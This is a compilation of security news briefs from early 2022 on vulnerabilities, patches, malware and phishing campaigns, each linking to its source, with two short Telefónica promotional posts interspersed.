emails are sent from legitimate accounts that have previously been compromised, which makes it very difficult for the various security tools active on the target machine to detect them. The ultimate goal of the campaign is mainly the theft of credentials stored in browsers and applications, as well as cryptocurrency wallets, SSH keys and even files stored on the victims' computers. Read more: https://www.bleepingcomputer.com/news/security/whatsapp-voice-message-phishing-emails-push-info-stealing-malware/ Cicada: new espionage campaign Symantec researchers have published research reporting on a sophisticated, long-term espionage campaign by the cybercriminal group Cicada (aka APT10). According to experts, the campaign is said to have been active from mid-2021 to February this year, with operations targeting government entities and NGOs in Asia, America and Europe. However, other sectors such as telecommunications, legal entities and pharmaceuticals have also been affected. The entry vector is believed to be the exploitation of a known vulnerability in unpatched Microsoft Exchange servers, with no specific vulnerability specified. After the initial compromise, Cicada deploys malware such as the Sodamaster backdoor, a tool associated with this actor and which has enabled its attribution, a custom loader via the legitimate VLC player that includes a malicious DLL, making use of the DLL Side-Loading technique, Mimikatz to obtain credentials, WinVNC for remote control or WMIExec for command execution. Read more: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-china-ngo-government-attacks New critical vulnerabilities in VMware VMware released a bulletin fixing critical, high and medium severity vulnerabilities for its VMware Workspace ONE Access (Access), VMware Identity Manager (vIDM), VMware vRealize Automation (vRA), VMware Cloud Foundation and vRealize Suite Lifecycle Manager products. The most critical vulnerabilities are the following: CVE-2022-22954 CVSSSv3 9.8: server-side template injection vulnerability that can lead to remote code execution. CVE-2022-22955/22956 CVSSv3 9.8: vulnerabilities that allow bypassing authentication in the OAuth2 ACS framework. CVE-2022-22957/22958 CVSSv3 9.1: remote code execution vulnerabilities via a malicious JDBC URI and requiring administrator access. Other vulnerabilities of high criticality (CVE-2022-22959 CVSSv3 8.8 and CVE-2022-22960 CVSSv3 7.8) and medium criticality (CVE-2022-22961 CVSSv3 5.3) have also been fixed. According to the company, there is no evidence that any of these vulnerabilities are being actively exploited. Additionally, VMware has published several steps that users can take to mitigate the impact of these vulnerabilities in cases where upgrading the software is not possible. Read more: https://www.vmware.com/security/advisories/VMSA-2022-0011.html

Spring4Shell vulnerability Spring has released security updates for the 0-day remote code execution (RCE) flaw known as Spring4Shell. Since the appearance of the vulnerability, unconfirmed information has been released from different researchers and media. Regarding this vulnerability, Spring published about specific details of the vulnerability, as well as assigning a CVE and publishing the patches that fix the bug. The vulnerability has been identified with the CVE-2022-22965 and, although its criticality under the CVSS scale is unknown for the moment, it is a vulnerability of critical severity. While the flaw can be exploited in multiple ways, Spring developers have stated that exploitation requires JDK version 9 or higher, Apache Tomcat as a Servlet container, WAR packaging and dependencies on the spring-webmvc or spring-webflux frameworks. Vulnerable versions have been confirmed, so it is recommended to upgrade to Spring Framework 5.3.18 and 5.2.20 or higher, and for Spring Boot to versions 2.6.6 and 2.5.12 or higher. They have also published a series of mitigations for those who are unable to deploy the updates. More info: https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement Phishing campaign impersonating Spanish organizations The Spanish Internet Security Office dubbed as, Oficina de Seguridad del Internauta (OSI), alerted about a phishing campaign impersonating the Spanish Tax Agency. The emails were sent from a spoofed address, displaying the domain @hacienda.hob.es, with the subject line "Comprobante fiscal digital - MINISTERIO DE HACIENDA Y FUCION PUBLICA". These emails urge victims to download an alleged .zip file containing documentation to be submitted to the public body, but in reality it contains malware. The Spanish Office states that the impersonation of other government bodies within the same campaign might not be discarded, therefore changing the subject and sender of the emails. The Digital Risk Protection Service has also been able to analyze this campaign, detecting the impersonation of the Ministry of Health and the Ministry of Finance, and identifying the malware distributed as the banking Trojan Mekotio. All details: https://www.osi.es/es/actualidad/avisos/2022/03/phishing-suplantando-la-agencia-tributaria-con-riesgo-de-infeccion-por Apple fixes actively exploited 0-day vulnerabilities Apple has released security updates fixing two new 0-day vulnerabilities that are reportedly being actively exploited and affecting its iPhone, iPad and Mac products. The first of the flaws, classified as CVE-2022-22674, is an out-of-bounds write vulnerability in the graphics driver for Intel, which, if exploited, could allow disclosure of kernel memory information. The second bug, classified as CVE-2022-22675, also corresponds to an out-of-bounds write vulnerability, but in the AppleAVD component. Affected products include: macOS Monterey, iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation). Both bugs have been resolved with iOS 15.4.1, iPadOS 15.4.1 and macOS Monterey 12.3.1. All info: https://support.apple.com/en-us/HT213220 New IcedID distribution campaign Researchers from Interzer and Fortinet have analyzed a new campaign of the IcedID malware, a modular banking Trojan first detected in 2017, commonly used in ransomware distribution. This campaign has been distributed via phishing emails from legitimate email accounts that have been previously compromised, reusing existing threads, containing malicious attachments. There is also a variation in the message attachment, which corresponds to a password-protected ZIP file, but instead of containing office documents as usual, it now contains an ISO image with a Windows LNK file and a DLL that executes the malware. The use of such files allows attackers to bypass Mark-of-the-Web controls and execute the malware without alerting the user. From the analysis of the compromised accounts, the researchers point to vulnerable Exchange servers publicly exposed to ProxyShell, suggesting that this may be the initial entry vector to the accounts being used in the campaign. Activity has focused on organizations in the energy, healthcare, legal and pharmaceutical sectors. Finally, overlaps have been observed in some of the TTPS used that have associated this activity with actors TA577 and TA551. More info: https://www.intezer.com/blog/research/conversation-hijacking-campaign-delivering-icedid/ Large-scale fraud against the retail sector Researchers from Segurança Informática have published an in-depth analysis of a fraud campaign against multiple brands in the retail sector, active since the end of 2020, whose activity has been increasing since the beginning of 2022. In this fraudulent scheme, domains similar to the original ones of the impacted brand, have been used to distribute phishing via malicious Google, Instagram or Facebook ads. All the malicious domains detected bear some similarity to the legitimate domains of the impersonated organizations, using typosquatting techniques, followed by different TLDs, including ".shop", ".website" or ".online". Once the victim accessed the advertisements, they were redirected to the fraudulent page where they found great discounts and offers and could place an online order and track the package. The victim's data was collected for future scams, and in some cases, they were sent parcels full of waste. The operators used homemade content management system (CMS) templates published on GitHub, in which, after changing a few images, they could clone any brand. The largest number of victims has been focused in Italy, Chile and Portugal, followed by other countries such as Spain and France. Through these operations, the attackers could have made a profit of more than one million euros to date. More info: https://seguranca-informatica.pt/shopping-trap-the-online-stores-scam-that-hits-users-worldwide/

Privilege escalation vulnerability in Western Digital Independent security researcher Xavier Danest has reported a privilege escalation vulnerability in EdgeRover. It should be mentioned that EdgeRover is a software developed by storage products manufacturer Western Digital for content management by unifying multiple storage devices under a single interface. Identified as CVE-2022-22988, the vulnerability has been rated as critical with a CVSSv3 of 9.1 as, due to a directory traversal flaw, it would allow an attacker who has previously compromised the target system to gain unauthorised access to restricted directories and files. This could additionally lead to local privilege escalation, disclosure of confidential information or denial of service (DoS) attacks. The flaw affects the desktop versions of EdgeRover for Windows and Mac, and it is currently unknown whether it is being actively exploited on the network. Western Digital has already fixed file and directory permissions to prevent unauthorised access and modification and recommends upgrading EdgeRover to version 1.5.1-594 or later, which addresses this vulnerability. For more: https://www.westerndigital.com/support/product-security/wdc-22004-edgerover-desktop-app-version-1-5-1-594 Serpent: new backdoor targeting French organisations Researchers at Proofpoint have discovered a new backdoor that would target French organisations in the construction and government sectors. The detected campaign makes use of macro-enabled Microsoft Word documents under the guise of GDPR-related information in order to distribute Chocolatey, a legitimate, open-source package installer that, after various stealth techniques such as steganography and scheduled task bypass, would implement the backdoor that Proofpoint has named "Serpent". Once the infection chain is successfully completed, the attacker would be able to manage the target host from its Command & Control (C2) server, exfiltrate sensitive information or even distribute additional payloads. Proofpoint highlights the possibility that Serpent is an advanced, targeted threat, based on its unique targeted behaviors such as steganography, although there is currently no evidence to attribute it to any specific known group. All the details: https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain Critical vulnerabilities in HP printer models HP has recently published two security bulletins reporting critical vulnerabilities affecting hundreds of the company's LaserJet Pro, Pagewide Pro, OfficeJet, Enterprise, Large Format and DeskJet printer models. On the one hand, on March 21st HP published a security advisory (HPSBPI03780) identifying a security flaw catalogued as CVE-2022-3942, CVSS 8.4. According to them, this is a buffer overflow flaw that could lead to remote code execution. The second bulletin (HPSBPI03781) contains three other vulnerabilities, two of which are classified as critical, namely VE-2022-24292 and CVE-2022-24293, CVSS 9.8. Exploitation of these vulnerabilities could allow malicious actors to cause information disclosure, remote code execution or denial of service. All of these security flaws were discovered by Trend Micro's Zero Day Initiative team. It should be noted that HP has released firmware security updates for most of the affected products, although not all models are patched yet. Discover more: https://support.hp.com/us-en/document/ish_5948778-5949142-16/hpsbpi03780 Spying campaign using new variant of Korplug malware ESET security researchers have detected a malicious campaign that has been active for at least eight months and is distributing a new variant of the Korplug remote access trojan (RAT). According to the investigation, the distribution of this malware would be carried out by sending emails under lures associated with current events such as COVID-19 or related to European institutional themes. Among the targets detected, ESET mentions that the campaign targets European diplomats, internet service providers and research institutes in countries such as Greece, Cyprus, and South Africa, among others. Korplug is a trojan previously associated with similar variants of PlugX malware that, depending on the campaign or threat actor using it in its operations, can have the ability to enumerate drives and directories, read and write files, execute commands on a hidden desktop, initiate remote sessions and communicate with the attackers' Command & Control (C2) server. However, we do not rule out the possibility that Korplug is in the midst of development, adding new stealth functionality. ESET attributes this campaign to the China-linked threat actor Mustang Panda (aka TA416), known to be primarily motivated by political espionage. More: https://www.welivesecurity.com/2022/03/23/mustang-panda-hodur-old-tricks-new-korplug-variant/ New North Korean APT campaigns exploiting 0-day Chrome exploits Google researchers have identified new campaigns attributed to two North Korean-linked cybercriminal groups that would have exploited remote code execution vulnerabilities in Chrome. The activity of these groups has previously been referred to as Operation Dream Job on the one hand, and Operation AppleJesus on the other. These APTs would have exploited the vulnerability CVE-2022-0609 for just over a month, before the patch was made available on 14 February. The activity is said to have targeted US entities, including media outlets, organisations in the technology sector, cryptocurrencies and the financial technology industry; however, it is possible that other sectors and geographies have also been targeted. The published analysis details the tactics, techniques and procedures (TTPs), indicators of compromise and details about the exploit used by the attackers, which could be exploited by other groups linked to North Korea. All of the details: https://blog.google/threat-analysis-group/countering-threats-north-korea/

Vishing by impersonating Microsoft The Office of Internet Security (OSI) has issued a security advisory to report an increase, in recent weeks, of fraudulent calls in which a supposed Microsoft employee indicates that the user's device is infected. In this type of fraud, known as vishing, the attacker urges the victim to install a remote access application, which will supposedly disinfect the device. Once the cybercriminal has gained access to the user's computer, they can steal all kinds of files stored on the device, get hold of the passwords stored in the browser, and even install malware that locks the computer and then asks for payment to unlock it. If the user has answered the call and installed the programme mentioned by the cybercriminal, the OSI recommends disconnecting the device from the network, uninstalling the installed programme and using an antivirus. More info: https://www.osi.es/es/actualidad/avisos/2022/03/vuelven-las-llamadas-fraudulentas-del-supuesto-soporte-tecnico-de Linux kernel Netfilter vulnerability Security researcher Nick Gregory has discovered a new vulnerability in the Linux kernel. This flaw, identified as CVE-2022-25636 and with a CVSSv3 of 7.8, involves an out-of-bounds write vulnerability in Netfilter, a Linux kernel framework that allows various network operations like packet filtering, address and port translation (NATP), connection tracing and other packet manipulation operations. A local attacker could exploit this vulnerability to escalate privileges and execute arbitrary code on the vulnerable system. It should be noted that the flaw affects Linux kernel versions 5.4 to 5.6.10, so it is recommended to upgrade to the new version as soon as possible, since there is a PoC available. More info: https://nickgregory.me/linux/security/2022/03/12/cve-2022-25636/ Brazilian trojan variant Maxtrilha targets Portuguese users Researcher Pedro Tavares of Segurança Informática has detected a possible new variant of the Brazilian Trojan known as Maxtrilha. This variant has been detected being distributed via phishing templates impersonating the Portuguese tax services (Autoridade Tributária e Aduaneira), targeting banking users in Portugal. Researchers consider this malware to be a new variant of the Brazilian trojan Maxtrilha due to the similarity of the samples, and the fact that it uses the same templates to attack users. In the distributed malicious emails, there is a URL that downloads an HTML file called "Dividas 2021.html" or "Financas.htm", which then downloads a ZIP file, ultimately downloading the malware. This new variant can install or modify trusted Windows certificates, perform a banking window overlay with the aim of stealing credentials, and can deploy additional payloads executed via the DLL injection technique. More info: https://seguranca-informatica.pt/brazilian-trojan-impacting-portuguese-users-and-using-the-same-capabilities-seen-in-other-latin-american-threats/ Apple fixes 87 vulnerabilities Apple has published 10 security bulletins that fix a total of 87 vulnerabilities in its different products and platforms: iOS 15.4 y iPadOS 15.4, watchOS 8.5, tvOS 15.4, macOS Monterey 12.3, macOS Big Sur 11.6.5, Actualización de seguridad 2022-003 Catalina, Xcode 13.3, Logic Pro X 10.7.3, GarageBand 10.4.6 e iTunes 12.12.3 para Windows. The vulnerabilities detected include flaws in WebKit (web browser engine used by Safari, Mail or App Store) that could lead to remote code execution (CVE-2022-22610, CVE-2022-22624, CVE-2022-22628 and CVE-2022-22629). There are also four other vulnerabilities in document, audio and video viewing components on iPhone and iPad that could allow malware deployment or privilege escalation (CVE-2022-22633, CVE-2022-22634, CVE-2022-22635 and CVE-2022-22636). Finally, it is worth noting that macOS includes updates for both the current version and the two previous versions, but only the most current versions of iOS, watchOS, iPadOS, and tvOS support these updates. https://nakedsecurity.sophos.com/2022/03/15/apple-patches-87-security-holes-from-iphones-and-macs-to-windows/ LokiLocker: new RaaS with wiper functionality BlackBerry's research team has identified a new Ransomware as a Service (RaaS) targeting computers running the Windows operating system. According to experts, this malware was first discovered in mid-August 2021, and would have affected victims worldwide, although most of these would be located in Europe and Asia. Among the most notable features of LokiLocker is that it is written in .NET and protected with NETGuard, and it also uses KoiVM, a virtualisation plugin that makes it difficult to analyse malware and is not commonly used. In addition, LokiLocker sets a time limit for paying the ransom if the victim does not agree to the ransomware's blackmail, uses a file-wiping function on the computer, except for system files, and overwrites the master boot record (MBR) of the system drive to render it unusable. More info: https://blogs.blackberry.com/en/2022/03/lokilocker-ransomware

MWC 2022 was undoubtedly one of the busiest in recent years. With the post-pandemic halt and the rescheduling of MWC 2021, even though it was only 6 months since the last edition, everyone there was really looking forward to meeting each other, talking about technology and having a coffee. In addition, this year Telefónica Tech brought to the physical stand in Barcelona and the virtual stand in the Telefónica Metaverse, a very complete proposal of all the digital transformation solutions for companies: IoT, Big Data, Blockchain, Cybersecurity and Cloud solutions. Throughout the conference, the visitors in Barcelona also focused on the face-to-face demos at the Telefónica stand, which was visited by more than 2,560 people. First of all, the Smart Industry demo, where visitors could discover the different use cases of: Automation: a key element that increases efficiency, reduces costs and, above all, allows operators to perform higher value-added tasks while technology performs more repetitive tasks. Sustainability: through the application of IoT, Big Data, 5G, Cybersecurity, Blockchain and Cloud technology, it is possible to extend the useful life of resources and respond to energy anomalies, contributing to protecting the environment. Remote assistance: through the robotic arm we have seen how, thanks to the low latency provided by 5G and virtual reality, we can respond to incidents remotely and in real time, allowing industries to reduce response times and minimise costs. And the Smart Buildings demo showed how the creation of smart buildings allows us to have integrated, automated, more efficient, healthier and safer management and control for people. We also saw how, through our integration platform, we obtain a centralised view of the data, which we collect, analyse and process. We brought all of this to the keynote sessions organised by the GSMA and to those held in the Agora itself at the Telefónica stand: '𝐈𝐧𝐧𝐨𝐯𝐚𝐭𝐢𝐧𝐠 𝐚𝐜𝐫𝐨𝐬𝐬 𝐛𝐮𝐬𝐢𝐧𝐞𝐬𝐬; 𝐦𝐨𝐯𝐢𝐧𝐠 𝐧𝐨𝐰 𝐭𝐨 𝐧𝐞𝐱𝐭' with Elena Gil Lizasoain taking part in a round table on the importance of diversity and inclusion as an essential commitment to enhance the value of companies. 'Digital rights and SDGs: sustainable business facing the digital rights challenge'. Once again, Elena Gil Lizasoain defended the conviction of companies regarding the need for digitalisation and the enormous role played by talent, especially people, in carrying out this transformation process. " Customers, employees and investors are increasingly demanding to work with companies that are sustainable" '𝐊𝐢𝐜𝐤𝐬𝐭𝐚𝐫𝐭𝐢𝐧𝐠 𝟓𝐆 𝐟𝐨𝐫 𝐌𝐚𝐧𝐮𝐟𝐚𝐜𝐭𝐮𝐫𝐢𝐧𝐠' with Andres Escribano Riesco talking about smart industry and how 5G and digital technologies are enabling us to develop real-world use cases.

Mozilla patches two 0-day vulnerabilities Mozilla has issued a security advisory patching two 0-day vulnerabilities that are reportedly being actively exploited and affect Firefox, Focus and Thunderbird. Both vulnerabilities were reported by the company 360 ATA security team. The first one, classified as CVE-2022-26485, is a use-after-free vulnerability in XSLT parameter processing, which allows document conversion. The second one, classified as CVE-2022-26486, is a use-after-free vulnerability in the WebGPU IPC framework. If exploited, a threat actor could execute code remotely, bypassing security, and could even compromise the device by downloading malicious code. Both vulnerabilities are fixed in Firefox 97.0.2, Firefox ESR 91.6.1, Firefox for Android 97.3.0 and Focus 97.3.0. Mozilla recommends updating as soon as possible. Discover more: https://www.mozilla.org/en-US/security/advisories/mfsa2022-09/#CVE-2022-26485 Dirty Pipe: new vulnerability in the Linux kernel Security researcher Max Kellermann has published details of a new vulnerability in the Linux kernel from version 5.8 that would allow local users to gain root privileges through exploits that are already publicly available. Identified as CVE-2022-0847 and with a CVSSv3 of 7.8, the bug would allow an unprivileged local user to inject and overwrite random data in read-only files, including SUID processes running as root, leading to privilege escalation on the affected system and even making it possible to manipulate sensitive files such as those located in the /etc/passwd path, which would allow the root user's password to be removed. In his publication, the researcher shares a proof of concept (PoC) and points out the similarity of this vulnerability with "Dirty Cow" (CVE-2016-5195), which came to light in October 2016, although on this occasion its exploitation would be less complex and groups such as Anonymous have already spoken out about it. The vulnerability has already been fixed in Linux versions 5.16.11, 5.15.25 and 5.10.102, so it is recommended to patch it as soon as possible given its potential impact if successfully exploited. All the details: https://dirtypipe.cm4all.com/ Microsoft update bulletin Microsoft has published its security bulletin for the month of March in which it reports the correction of a total of 74 flaws, including three critical vulnerabilities according to the firm and three 0-days that are reportedly not being actively exploited. Critical vulnerabilities according to Microsoft: The most critical of the three flaws (CVE-2022-23277 CVSSv3 8.8) affects Microsoft Exchange Server and allows an authenticated attacker to target server accounts with the goal of executing remote code with ADMIN privileges, due to a flaw in memory management by the server. The other two flaws also classified as critical by Microsoft, CVE-2022-22006 and CVE-2022-24501, both with CVSSv3 7.8, affect the HEVC and VP9 video extensions but their exploitation requires social engineering as it requires the victim to download and open a specially modified file. 0-days: The most serious flaw of this type, CVE-2022-21990 CVSSv3 8.8, allows remote code execution in RDP. Some researchers point out that this flaw should be considered critical and stress that, although it is not actively exploited yet, it may be exploited soon since a proof-of-concept is already available. The other two 0-day fixes are identified as CVE-2022-23285 CVSSv3 8.8 and CVE-2022-24503 CVSSv3 5.4. More: https://msrc.microsoft.com/update-guide/releaseNote/2022-Mar UEFI firmware vulnerabilities HP, in conjunction with the Binarly team, have discovered multiple high-impact vulnerabilities related to UEFI firmware, which are reportedly affecting different HP products such as laptops and desktops, or perimeter nodes and point-of-sale (PoS) systems. These have been classified as CVE-2021-39298 with CVSSv3 8.8, CVE-2021-39297, CVE-2021-39299, CVE-2021-39300 and CVE-2021-39301, all with CVSSv3 of 7.5. When exploited, a threat agent could inject malicious code, escalate privileges, as well as remain on devices after operating system updates. HP has provided firmware updates and instructions on how to update the BIOS. All the information: https://support.hp.com/us-en/document/ish_5661066-5661090-16 Analysis of the resurgence of Emotet Researchers at Black Lotus Labs have published an analysis of evidence of the resurgence of the Emotet botnet since November 2021. The researchers indicate that since then, the botnet has shown a sharp increase in activity through approximately 130,000 unique bots spread across 179 countries, accumulating more than 1.6 million infected devices. The malware resurfaced using Trickbot as a delivery method, and although its Command&Control (C2) structure was reportedly reinstated in November, the addition of bots was not announced until January. The technical details of the report reveal that Emotet has made notable changes to its operation, such as the algorithm used to encrypt network traffic, which is now based on elliptic cryptography (ECC); or the change in the tiering model, marked by the absence of Bot C2, although it is not known whether this is a temporary or permanent change. As Emotet is distributed via compromised emails with malicious attachments, the researchers recommend intensifying anti-phishing preventive measures and monitoring network resources to prevent possible downstream incidents. More info: https://blog.lumen.com/emotet-redux/

In a previous post of our blog, we already told you how the combination of technologies based on Artificial Intelligence, Iot and Big Data, the "Artificial Intelligence of Things", helps us to have a safer, more efficient, sustainable and human life. AI of Things, the Artificial Intelligence of Things What is the real meaning of Artificial Intelligence of Things? It may look like something new, but if we get to know its meaning, we will realize that it is already present in our daily lives. And it is not a fleeting thing, it is here to stay. Discover the full potential of AI of Things on the new website The new AI of Things website is the perfect place to learn about our wide portfolio of solutions for mobility management, industry 5.0, smart spaces, companies looking for energy monitoring and management or advertising solutions. In addition, our capabilities in connectivity, professional services in strategic consulting and advanced analytics and training, AI & Business Insights platforms and technological enablers such as Blockchain, allow us to offer all the potential derived from the union of IoT, Big Data, Artificial Intelligence and Blockchain technologies. This union allows us to accompany organisations of all types of industries in their digital transformation. Thanks to the sectoral value proposition, designed for more than 12 sectors and resolved in 140 use cases, we help transform organisations in sectors such as mobility, transport, tourism, logistics and distribution, utilities and many others. All this is reflected in the extensive gallery of success stories of customers who have already relied on the solutions and capabilities that we offer from Telefónica Tech AI of Things and that show how solutions based on IoT, Big Data, Artificial Intelligence and Blockchain technologies are already a reality in society. We have unified our social media channels We have unified our social media channels to offer you clearer, more accessible, and accurate information. If you don't want to miss any of our posts, video posts, webinars, infographics, events, live events, etc, take note of our new channels. Twitter: All our news in English: https://twitter.com/TefTechAIoT_EN (English account). LinkedIn: https://www.linkedin.com/company/telefonica-tech-aiofthings Blog: Our articles in English: https://business.blogthinkbig.com/telefonica-tech-aiofthings Youtube: https://www.youtube.com/c/telefonicatechaiofthings We look forward to seeing you on all our social channels! -AI of Things. Join the magic-

Daxin: highly sophisticated backdoor Researchers at Symantec have published a paper reporting a new backdoor they have called Daxin, which they attribute to actors linked to China. According to Symantec, it is the most advanced malware they have seen from Chinese threat actors. Daxin can read and write files and start processes, but is particularly notable for its stealth and the way it communicates with its Command & Control. The malware is able to hijack legitimate TCP/IP connections in order to achieve a key exchange with its remote peer, thus opening an encrypted communication channel to receive commands and send responses by hiding among legitimate traffic and bypassing security solutions. Another notable functionality is its ability to create a new communication channel across multiple infected computers on the same network using a single command for a set of nodes. This allows it to quickly re-establish connections and encrypted communication channels. Symantec has identified Daxin in government organisations, as well as entities in the telecommunications, transportation and industry sectors that are of strategic interest to China. The attacks observed date back to November 2021 but note that the oldest sample identified dates back to 2013. More info: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/daxin-backdoor-espionage Critical vulnerability in GitLab GitLab has released a security update that fixes a total of 7 vulnerabilities affecting GitLab Community Edition (CE) and Enterprise Edition (EE). Among the security flaws, the most notable is the one identified as CVE-2022-0735, which has a CVSS score of 9.6. Exploitation of this vulnerability could allow an unauthenticated attacker to obtain a registration token from a runner, enabling remote code execution. Although the technical details of the vulnerability have not been published, the exploitation of this vulnerability would be of low complexity and would not require privileges or user interaction to be exploited. This vulnerability affects all versions from 12.10 to 14.6.4, 14.7 to 14.7.3, and all versions from 14.8 to 14.8.1. As a result, GitLab has recommended upgrading to versions 14.8.2, 14.7.4, and 14.6.5 of GitLab Community Edition (CE) and Enterprise Edition (EE). All the details: https://about.gitlab.com/releases/2022/02/25/critical-security-release-gitlab-14-8-2-released/ Distribution of TeaBot via the Google Play shop Researchers at Cleafy have published a new article on the TeaBot banking trojan, also known as Anatsa, which has reportedly started to be distributed via rogue apps hosted on the Google Play shop. This banking trojan emerged in early 2021 and was primarily distributed via smishing campaigns. The new samples, however, have switched to using Google Play as a means of distribution, with a Teabot dropper hiding behind a QR code scanner app (QR Code & Barcode - Scanner). Upon downloading the app, the dropper will require the user to update the app via a pop-up message. This supposed update will not actually be an update, but a second application ('QR Code Scanner: Add-On') will be downloaded from an untrusted source. This second application is the one already identified as Teabot, which asks the user for permissions to accessibility services to obtain privileges such as viewing and controlling the screen and viewing and performing actions. Recent Teabot campaigns have gone on to support languages such as Russian, Slovakian and Mandarin Chinese, so the malware could be expanding its targets geographically. More: https://www.cleafy.com/cleafy-labs/teabot-is-now-spreading-across-the-globe

New privilege escalation flaw in Linux Security researchers at Qualys have discovered seven flaws in Canonical's Snap software packaging and deployment system used in operating systems that use the Linux kernel. The most severe of these vulnerabilities, listed as CVE-2021-44731 and reportedly receiving a CVSSv3 of 7.8, is a privilege escalation flaw in the snap-confine function, used internally by the snapd tool to build the execution environment for snap applications. Successful exploitation could allow any unprivileged user to gain root privileges on the vulnerable host. The flaw was communicated to vendors and open-source distributions as soon as it was discovered last October, leading to a coordinated patch release process on 17 February. Qualys technicians have also developed an exploit for this issue that allows full root privileges to be obtained on default Ubuntu installations. The other six vulnerabilities identified are: CVE-2021-3995, CVE-2021-3996, CVE-2021-3997, CVE-2021-3998, CVE-2021-3999, CVE-2021-44730. All the details:https://blog.qualys.com/vulnerabilities-threat-research/2022/02/17/oh-snap-more-lemmings-local-privilege-escalation-vulnerability-discovered-in-snap-confine-cve-2021-44731 Conti ransomware operators take over TrickBot operations Researchers at Advanced Intelligence have published a report indicating that the TrickBot malware has transferred its management to the Conti ransomware operators. AdvIntel's experts have analysed the background of TrickBot, noting a historically close relationship with the ransomware and its subsequent rise to prominence. Conti has relied, among other factors, on maintaining a code of conduct among its operators, which has allowed it to thrive and remain active in the face of other ransomware groups that have been dismantled by various law enforcement operations. Experts suggest that TrickBot gradually became a subsidiary of Conti's operators, as they were the only ones to use it in their operations. Also, by the end of 2021, Conti finally absorbed multiple TrickBot developers and operators. However, it is worth noting that since TrickBot's networks are reportedly being easily detected, Conti operators have begun to replace it with the BazarBackDoor malware, which is under its development and is used to gain initial access to its victims' networks. More: https://www.advintel.io/post/the-trickbot-saga-s-finale-has-aired-but-a-spinoff-is-already-in-the-works Cobalt Strike distributed on vulnerable MS-SQL servers Analysts at ASEC have discovered a new campaign where vulnerable Microsoft SQL (MS-SQL) servers that are exposed to the internet are being attacked by malicious actors with the goal of distributing Cobalt Strike on compromised hosts. The attacks targeting MS-SQL servers include attacks on the environment where the vulnerability has not been patched, brute-force attacks and dictionary attacks against mismanaged servers. First, the malicious actor scans port 1433 to check if MS-SQL servers are open to the public, and then carries out brute-force or dictionary attacks against the administrator account to try to log in. Different malware such as Lemon Duck allow scanning of this port and propagate in order to move laterally in the internal network. The attacks culminate in the decryption of the Cobalt Strike executable, followed by its injection into the legitimate Microsoft Build Engine (MSBuild) process, which has been exploited in the past by malicious actors to deploy remote access trojans and credential-stealing malware. Finally, it is worth noting that the version of Cobalt Strike running on MSBuild.exe comes with additional settings to evade detection by security software. All the details: https://asec.ahnlab.com/en/31811/

Researchers develop exploit for critical vulnerability in Magento Positive Technologies' offensive security team has developed a Proof of Concept (PoC) for the CVE-2022-24086 CVSSv3 9.8 vulnerability, claiming that it would allow control of the system to be gained with web server permissions. However, the researchers have stated that they do not intend to release this exploit either publicly or privately to other industry analysts. This critical vulnerability affecting Adobe Commerce and Magento Open Source was fixed by Adobe last Sunday in a security update. Exploiting this flaw would allow an unauthenticated attacker to execute arbitrary code remotely, although it is worth noting that, despite not requiring authentication, it can only be exploited by an attacker with administrator privileges. The flaw affects Magento Open Source and Adobe Commerce versions 2.4.3-p1 and 2.3.7-p2 and earlier, with the exception of Adobe Commerce versions prior to 2.3.3.3. Also yesterday, Adobe updated this security bulletin to add a new flaw, CVE-2022-24087, also of the Improper Input Validation type, which also has a CVSSv3 score of 9.8 and would allow an unauthenticated attacker to execute arbitrary code remotely. It is recommended to patch both critical vulnerabilities as soon as possible. More info: https://helpx.adobe.com/security/products/magento/apsb22-12.html 0-day in Chrome being actively exploited Google released fixes for eight security flaws in the Google Chrome browser on Monday, including a high-criticality vulnerability that is being actively exploited. This use-after-free vulnerability resides in the animation component, has been identified as CVE-2022-0609 and, if successfully exploited, would allow an attacker to execute arbitrary code remotely, as well as alter legitimate information. Google has also addressed four other high-criticality vulnerabilities of the use-after-free type that affect the file manager, ANGLE, GPU and Webstore API, as well as a heap buffer overflow vulnerability in Tab Groups and an inappropriate implementation in the Gamepad API. Google recommends updating Google Chrome to version 98.0.4758.102 to fix these bugs. Discover more: https://chromereleases.googleblog.com/2022/02/stable-channel-update-for-desktop_14.html TA2541 campaign persistent over time Researchers at Proofpoint have published a new paper attributing a long-running, persistent attack campaign to the TA2541 group. The campaign targets aviation, aerospace, transportation, manufacturing and defence sectors in North America, Europe and the Middle East. The activity of this group dates back to 2017 and, since that year, they have used TTPs that have been maintained over time. The usual entry vector identified is an English-language phishing campaign using aviation, transport or travel-related subjects. They do not take advantage of current subjects as other groups often do, although they have also occasionally mixed their usual subjects with current ones like COVID-19. These emails include attachments that already download the payloads of different RATS, mainly families that can be easily acquired in cybercrime forums, with AsyncRAT, NetWire and WSH RAT standing out above the rest. The group has recently improved its campaigns and is no longer sending payloads in attachments, but in links included in emails that connect to cloud services. All details: https://www.proofpoint.com/us/blog/threat-insight/charting-ta2541s-flight Classified US information exfiltrated by Russian actors CISA has published a security advisory warning of a cyber espionage campaign dating back to at least January 2020. According to the warning, Russian threat actors have compromised and exfiltrated information from US-authorised defence contractors (CDC), private entities that are authorised to access highly sensitive information in order to bid for contracts, access information in the areas of intelligence, armaments, aircraft, information technology, among others. Among the techniques used as an entry vector, the attackers would have used spearphishing campaigns, credential harvesting, brute force techniques, password spraying or the exploitation of vulnerabilities. Once the companies had been compromised, the attackers managed to establish persistence in some of them for at least six months, thus enabling Russia to obtain strategic information with which it could have established military priorities, strategic plans and accelerated software development. More info: https://www.cisa.gov/uscert/ncas/alerts/aa22-047a

